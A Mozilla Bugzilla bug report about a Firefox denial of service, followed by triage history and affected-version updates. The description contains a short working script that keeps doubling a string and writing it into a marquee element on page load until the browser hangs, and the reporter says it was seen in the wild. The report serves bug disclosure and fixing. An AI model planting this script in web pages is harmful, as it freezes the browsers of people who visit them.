Open
Bug 620492
Opened 14 years ago
Updated 2 years ago
DoS with long string in <marquee>
Categories
(Core :: DOM: Core & HTML, defect, P5)
Core
DOM: Core & HTML
Tracking
()
People
(Reporter: c750299, Unassigned)
References
Details
(Keywords: testcase, Whiteboard: [sg:dos])
Attachments
(1 file)
285 bytes,
text/html
|
Details |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc14 Firefox/3.6.13 Build Identifier: This script can shut down browsers. It was seen in the wild, yesterday, on multiple sites. <html> <head/><body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = '\x42'; for (i =0;i<666;i++) { buffer+=buffer+'\x42'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> </html> Reproducible: Always Maybe the browser can detect this and not stop working?
Updated•14 years ago
|
Group: core-security
Component: General → DOM
Product: Firefox → Core
QA Contact: general → general
Summary: Denial-of-Service script → DoS with long string in <marquee>
Whiteboard: [sg:dos]
Comment 1•14 years ago
|
||
Affecting 3.5, 3.6 and trunk.
Status: UNCONFIRMED → NEW
blocking2.0: --- → ?
status1.9.1:
--- → ?
status1.9.2:
--- → ?
Ever confirmed: true
Version: unspecified → Trunk
Comment 2•14 years ago
|
||
Updated•14 years ago
|
Severity: normal → critical
Updated•13 years ago
|
Comment 4•6 years ago
|
||
https://bugzilla.mozilla.org/show_bug.cgi?id=1472046 Move all DOM bugs that haven’t been updated in more than 3 years and has no one currently assigned to P5. If you have questions, please contact :mdaly.
Priority: -- → P5
Assignee | ||
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
This bug is also reproducible in windows10 64 and affects:
Firefox Release 85
Firefox ESR 78.7.0
Nightly 87.0a1
Beta 86.0b4
status-firefox85:
--- → affected
status-firefox86:
--- → affected
status-firefox87:
--- → affected
status-firefox-esr78:
--- → affected
Comment 6•2 years ago
|
||
In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.
Severity: critical → --
Updated•2 years ago
|
Severity: -- → S3
You need to log in
before you can comment on or make changes to this bug.
Description
•